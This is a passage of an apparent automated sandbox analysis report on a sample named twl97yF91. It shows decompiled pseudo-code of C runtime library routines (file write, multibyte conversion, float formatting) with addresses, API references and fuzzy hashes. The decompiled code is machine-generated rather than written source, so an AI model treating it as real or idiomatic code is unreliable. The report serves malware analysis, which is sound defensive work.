                                                                                                                                                                                                          						_v16 = _t97;
                                                                                                                                                                                                          						_t81 = _t97;
                                                                                                                                                                                                          						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                          							_v12 = 0x1000;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_v12 =  *(_t100 + 0x18);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t97;
                                                                                                                                                                                                          						if(_t97 == 0) {
                                                                                                                                                                                                          							L32:
                                                                                                                                                                                                          							return _a12;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                                                                                                          								__eflags = _t84;
                                                                                                                                                                                                          								if(_t84 == 0) {
                                                                                                                                                                                                          									L18:
                                                                                                                                                                                                          									__eflags = _t81 - _v12;
                                                                                                                                                                                                          									if(_t81 < _v12) {
                                                                                                                                                                                                          										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                                                                                                                                                          										__eflags = _t68 - 0xffffffff;
                                                                                                                                                                                                          										if(_t68 == 0xffffffff) {
                                                                                                                                                                                                          											L34:
                                                                                                                                                                                                          											_t69 = _t97;
                                                                                                                                                                                                          											L35:
                                                                                                                                                                                                          											return (_t69 - _t81) / _a8;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v8 = _v8 + 1;
                                                                                                                                                                                                          										_t72 =  *(_t100 + 0x18);
                                                                                                                                                                                                          										_t81 = _t81 - 1;
                                                                                                                                                                                                          										_v12 = _t72;
                                                                                                                                                                                                          										__eflags = _t72;
                                                                                                                                                                                                          										if(_t72 <= 0) {
                                                                                                                                                                                                          											_v12 = 1;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L31;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _t84;
                                                                                                                                                                                                          									if(_t84 == 0) {
                                                                                                                                                                                                          										L21:
                                                                                                                                                                                                          										__eflags = _v12;
                                                                                                                                                                                                          										_t98 = _t81;
                                                                                                                                                                                                          										if(_v12 != 0) {
                                                                                                                                                                                                          											_t75 = _t81;
                                                                                                                                                                                                          											_t90 = _t75 % _v12;
                                                                                                                                                                                                          											_t98 = _t98 - _t75 % _v12;
                                                                                                                                                                                                          											__eflags = _t98;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_push(_t98);
                                                                                                                                                                                                          										_push(_v8);
                                                                                                                                                                                                          										_push(E0040FA20(_t90, _t98, _t100));
                                                                                                                                                                                                          										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                                                                                                          										_t101 = _t101 + 0xc;
                                                                                                                                                                                                          										__eflags = _t74 - 0xffffffff;
                                                                                                                                                                                                          										if(_t74 == 0xffffffff) {
                                                                                                                                                                                                          											L36:
                                                                                                                                                                                                          											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                          											_t69 = _v16;
                                                                                                                                                                                                          											goto L35;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t88 = _t98;
                                                                                                                                                                                                          											__eflags = _t74 - _t98;
                                                                                                                                                                                                          											if(_t74 <= _t98) {
                                                                                                                                                                                                          												_t88 = _t74;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_v8 = _v8 + _t88;
                                                                                                                                                                                                          											_t81 = _t81 - _t88;
                                                                                                                                                                                                          											__eflags = _t74 - _t98;
                                                                                                                                                                                                          											if(_t74 < _t98) {
                                                                                                                                                                                                          												goto L36;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												L27:
                                                                                                                                                                                                          												_t97 = _v16;
                                                                                                                                                                                                          												goto L31;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t77 = E0040C1FB(_t100);
                                                                                                                                                                                                          									__eflags = _t77;
                                                                                                                                                                                                          									if(_t77 != 0) {
                                                                                                                                                                                                          										goto L34;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t78 =  *(_t100 + 4);
                                                                                                                                                                                                          								__eflags = _t78;
                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                          									goto L18;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                          									_t48 = _t100 + 0xc;
                                                                                                                                                                                                          									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                          									__eflags =  *_t48;
                                                                                                                                                                                                          									goto L34;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t99 = _t81;
                                                                                                                                                                                                          								__eflags = _t81 - _t78;
                                                                                                                                                                                                          								if(_t81 >= _t78) {
                                                                                                                                                                                                          									_t99 = _t78;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                                                                                                          								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                                                                                                          								 *_t100 =  *_t100 + _t99;
                                                                                                                                                                                                          								_t101 = _t101 + 0xc;
                                                                                                                                                                                                          								_t81 = _t81 - _t99;
                                                                                                                                                                                                          								_v8 = _v8 + _t99;
                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                          								L31:
                                                                                                                                                                                                          								__eflags = _t81;
                                                                                                                                                                                                          							} while (_t81 != 0);
                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_t61 = E0040BFC1(_t105);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					 *_t61 = 0x16;
                                                                                                                                                                                                          					E0040E744(_t90, 0, _t100);
                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





























                                                                                                                                                                                                          0x0040baaa
                                                                                                                                                                                                          0x0040baba
                                                                                                                                                                                                          0x0040bae0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bac1
                                                                                                                                                                                                          0x0040bac1
                                                                                                                                                                                                          0x0040bac4
                                                                                                                                                                                                          0x0040bac6
                                                                                                                                                                                                          0x0040bae7
                                                                                                                                                                                                          0x0040baea
                                                                                                                                                                                                          0x0040baec
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040baee
                                                                                                                                                                                                          0x0040baf3
                                                                                                                                                                                                          0x0040baf6
                                                                                                                                                                                                          0x0040baf9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bafe
                                                                                                                                                                                                          0x0040bb02
                                                                                                                                                                                                          0x0040bb09
                                                                                                                                                                                                          0x0040bb0c
                                                                                                                                                                                                          0x0040bb0f
                                                                                                                                                                                                          0x0040bb11
                                                                                                                                                                                                          0x0040bb1b
                                                                                                                                                                                                          0x0040bb13
                                                                                                                                                                                                          0x0040bb16
                                                                                                                                                                                                          0x0040bb16
                                                                                                                                                                                                          0x0040bb22
                                                                                                                                                                                                          0x0040bb24
                                                                                                                                                                                                          0x0040bbe9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bb2a
                                                                                                                                                                                                          0x0040bb2a
                                                                                                                                                                                                          0x0040bb2d
                                                                                                                                                                                                          0x0040bb2d
                                                                                                                                                                                                          0x0040bb33
                                                                                                                                                                                                          0x0040bb64
                                                                                                                                                                                                          0x0040bb64
                                                                                                                                                                                                          0x0040bb67
                                                                                                                                                                                                          0x0040bbc0
                                                                                                                                                                                                          0x0040bbc7
                                                                                                                                                                                                          0x0040bbca
                                                                                                                                                                                                          0x0040bbf5
                                                                                                                                                                                                          0x0040bbf5
                                                                                                                                                                                                          0x0040bbf7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bbfb
                                                                                                                                                                                                          0x0040bbcc
                                                                                                                                                                                                          0x0040bbcf
                                                                                                                                                                                                          0x0040bbd2
                                                                                                                                                                                                          0x0040bbd3
                                                                                                                                                                                                          0x0040bbd6
                                                                                                                                                                                                          0x0040bbd8
                                                                                                                                                                                                          0x0040bbda
                                                                                                                                                                                                          0x0040bbda
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bbd8
                                                                                                                                                                                                          0x0040bb69
                                                                                                                                                                                                          0x0040bb6b
                                                                                                                                                                                                          0x0040bb78
                                                                                                                                                                                                          0x0040bb78
                                                                                                                                                                                                          0x0040bb7c
                                                                                                                                                                                                          0x0040bb7e
                                                                                                                                                                                                          0x0040bb82
                                                                                                                                                                                                          0x0040bb84
                                                                                                                                                                                                          0x0040bb87
                                                                                                                                                                                                          0x0040bb87
                                                                                                                                                                                                          0x0040bb87
                                                                                                                                                                                                          0x0040bb89
                                                                                                                                                                                                          0x0040bb8a
                                                                                                                                                                                                          0x0040bb94
                                                                                                                                                                                                          0x0040bb95
                                                                                                                                                                                                          0x0040bb9a
                                                                                                                                                                                                          0x0040bb9d
                                                                                                                                                                                                          0x0040bba0
                                                                                                                                                                                                          0x0040bc03
                                                                                                                                                                                                          0x0040bc03
                                                                                                                                                                                                          0x0040bc07
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bba2
                                                                                                                                                                                                          0x0040bba2
                                                                                                                                                                                                          0x0040bba4
                                                                                                                                                                                                          0x0040bba6
                                                                                                                                                                                                          0x0040bba8
                                                                                                                                                                                                          0x0040bba8
                                                                                                                                                                                                          0x0040bbaa
                                                                                                                                                                                                          0x0040bbad
                                                                                                                                                                                                          0x0040bbaf
                                                                                                                                                                                                          0x0040bbb1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bbb3
                                                                                                                                                                                                          0x0040bbb3
                                                                                                                                                                                                          0x0040bbb3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bbb3
                                                                                                                                                                                                          0x0040bbb1
                                                                                                                                                                                                          0x0040bba0
                                                                                                                                                                                                          0x0040bb6e
                                                                                                                                                                                                          0x0040bb74
                                                                                                                                                                                                          0x0040bb76
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bb76
                                                                                                                                                                                                          0x0040bb35
                                                                                                                                                                                                          0x0040bb38
                                                                                                                                                                                                          0x0040bb3a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bb3c
                                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                                          0x0040bb42
                                                                                                                                                                                                          0x0040bb44
                                                                                                                                                                                                          0x0040bb46
                                                                                                                                                                                                          0x0040bb48
                                                                                                                                                                                                          0x0040bb48
                                                                                                                                                                                                          0x0040bb50
                                                                                                                                                                                                          0x0040bb55
                                                                                                                                                                                                          0x0040bb58
                                                                                                                                                                                                          0x0040bb5a
                                                                                                                                                                                                          0x0040bb5d
                                                                                                                                                                                                          0x0040bb5f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bbe1
                                                                                                                                                                                                          0x0040bbe1
                                                                                                                                                                                                          0x0040bbe1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bb2a
                                                                                                                                                                                                          0x0040bb24
                                                                                                                                                                                                          0x0040bac8
                                                                                                                                                                                                          0x0040bac8
                                                                                                                                                                                                          0x0040bacd
                                                                                                                                                                                                          0x0040bace
                                                                                                                                                                                                          0x0040bacf
                                                                                                                                                                                                          0x0040bad0
                                                                                                                                                                                                          0x0040bad1
                                                                                                                                                                                                          0x0040bad2
                                                                                                                                                                                                          0x0040bad8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040badd

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                          • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                          • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3240763771-0
                                                                                                                                                                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                          • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02CC553A
                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 02CC556E
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02CC559F
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02CC560D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                          • Instruction ID: 07d83873620e1095b3ab4d8e3fa0eb3d06c225d70c8dc1196a63a4d8f12efdbe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C31D631A10285EFDB20DF64C884ABE7BB6FF41394FA445ADE465AB191E730EA40DF50
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                          				char _t43;
                                                                                                                                                                                                          				char _t46;
                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                          				int _t57;
                                                                                                                                                                                                          				int _t58;
                                                                                                                                                                                                          				signed short* _t59;
                                                                                                                                                                                                          				short* _t60;
                                                                                                                                                                                                          				int _t65;
                                                                                                                                                                                                          				char* _t72;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t72 = _a8;
                                                                                                                                                                                                          				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					if( *_t72 != 0) {
                                                                                                                                                                                                          						E0040EC86( &_v20, _a16);
                                                                                                                                                                                                          						_t43 = _v20;
                                                                                                                                                                                                          						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                                                          						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                                                          							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                                                          							__eflags = _t46;
                                                                                                                                                                                                          							if(_t46 == 0) {
                                                                                                                                                                                                          								__eflags = _a4;
                                                                                                                                                                                                          								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									L10:
                                                                                                                                                                                                          									__eflags = _v8;
                                                                                                                                                                                                          									if(_v8 != 0) {
                                                                                                                                                                                                          										_t53 = _v12;
                                                                                                                                                                                                          										_t11 = _t53 + 0x70;
                                                                                                                                                                                                          										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                          										__eflags =  *_t11;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									return 1;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                          								_t54 = E0040BFC1(__eflags);
                                                                                                                                                                                                          								 *_t54 = 0x2a;
                                                                                                                                                                                                          								__eflags = _v8;
                                                                                                                                                                                                          								if(_v8 != 0) {
                                                                                                                                                                                                          									_t54 = _v12;
                                                                                                                                                                                                          									_t33 = _t54 + 0x70;
                                                                                                                                                                                                          									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                          									__eflags =  *_t33;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								return _t54 | 0xffffffff;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t56 = _v20;
                                                                                                                                                                                                          							_t65 =  *(_t56 + 0xac);
                                                                                                                                                                                                          							__eflags = _t65 - 1;
                                                                                                                                                                                                          							if(_t65 <= 1) {
                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                          								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t72[1];
                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L19:
                                                                                                                                                                                                          								_t57 =  *(_t56 + 0xac);
                                                                                                                                                                                                          								__eflags = _v8;
                                                                                                                                                                                                          								if(_v8 == 0) {
                                                                                                                                                                                                          									return _t57;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                          								return _t57;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _a12 - _t65;
                                                                                                                                                                                                          							if(_a12 < _t65) {
                                                                                                                                                                                                          								goto L17;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _a4;
                                                                                                                                                                                                          							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                          							_t56 = _v20;
                                                                                                                                                                                                          							if(_t58 != 0) {
                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t59 = _a4;
                                                                                                                                                                                                          						__eflags = _t59;
                                                                                                                                                                                                          						if(_t59 != 0) {
                                                                                                                                                                                                          							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t60 = _a4;
                                                                                                                                                                                                          						if(_t60 != 0) {
                                                                                                                                                                                                          							 *_t60 = 0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}

















                                                                                                                                                                                                          0x004152a9
                                                                                                                                                                                                          0x004152b0
                                                                                                                                                                                                          0x004152c7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004152b7
                                                                                                                                                                                                          0x004152b9
                                                                                                                                                                                                          0x004152d3
                                                                                                                                                                                                          0x004152d8
                                                                                                                                                                                                          0x004152db
                                                                                                                                                                                                          0x004152de
                                                                                                                                                                                                          0x00415307
                                                                                                                                                                                                          0x0041530e
                                                                                                                                                                                                          0x00415310
                                                                                                                                                                                                          0x00415391
                                                                                                                                                                                                          0x004153ac
                                                                                                                                                                                                          0x004153ae
                                                                                                                                                                                                          0x004152ee
                                                                                                                                                                                                          0x004152ee
                                                                                                                                                                                                          0x004152f1
                                                                                                                                                                                                          0x004152f3
                                                                                                                                                                                                          0x004152f6
                                                                                                                                                                                                          0x004152f6
                                                                                                                                                                                                          0x004152f6
                                                                                                                                                                                                          0x004152f6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004152fc
                                                                                                                                                                                                          0x00415370
                                                                                                                                                                                                          0x00415370
                                                                                                                                                                                                          0x00415375
                                                                                                                                                                                                          0x0041537b
                                                                                                                                                                                                          0x0041537e
                                                                                                                                                                                                          0x00415380
                                                                                                                                                                                                          0x00415383
                                                                                                                                                                                                          0x00415383
                                                                                                                                                                                                          0x00415383
                                                                                                                                                                                                          0x00415383
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00415387
                                                                                                                                                                                                          0x00415312
                                                                                                                                                                                                          0x00415315
                                                                                                                                                                                                          0x0041531b
                                                                                                                                                                                                          0x0041531e
                                                                                                                                                                                                          0x00415345
                                                                                                                                                                                                          0x00415348
                                                                                                                                                                                                          0x0041534e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00415350
                                                                                                                                                                                                          0x00415353
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00415355
                                                                                                                                                                                                          0x00415355
                                                                                                                                                                                                          0x0041535b
                                                                                                                                                                                                          0x0041535e
                                                                                                                                                                                                          0x004152cc
                                                                                                                                                                                                          0x004152cc
                                                                                                                                                                                                          0x00415367
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00415367
                                                                                                                                                                                                          0x00415320
                                                                                                                                                                                                          0x00415323
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00415327
                                                                                                                                                                                                          0x00415338
                                                                                                                                                                                                          0x0041533e
                                                                                                                                                                                                          0x00415340
                                                                                                                                                                                                          0x00415343
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00415343
                                                                                                                                                                                                          0x004152e0
                                                                                                                                                                                                          0x004152e3
                                                                                                                                                                                                          0x004152e5
                                                                                                                                                                                                          0x004152eb
                                                                                                                                                                                                          0x004152eb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004152bb
                                                                                                                                                                                                          0x004152bb
                                                                                                                                                                                                          0x004152c0
                                                                                                                                                                                                          0x004152c4
                                                                                                                                                                                                          0x004152c4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004152c0
                                                                                                                                                                                                          0x004152b9

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                          • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                          • Instruction ID: a03f6f1118ad3dc04a95bfafb1aa809462bc4ab981edc6e18a6e286535982e66
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C611807240018ABBCF125E85ED45CEE3F63BF48354B6984A9FA185A130D333C6B1EB81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t25 = _a16;
                                                                                                                                                                                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                                                          					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t34 = _t25 - 0x66;
                                                                                                                                                                                                          					if(_t25 != 0x66) {
                                                                                                                                                                                                          						__eflags = _t25 - 0x61;
                                                                                                                                                                                                          						if(_t25 == 0x61) {
                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                          							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							__eflags = _t25 - 0x41;
                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                          						return _t26;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          0x004134e0
                                                                                                                                                                                                          0x004134e6
                                                                                                                                                                                                          0x00413559
                                                                                                                                                                                                          0x00000000
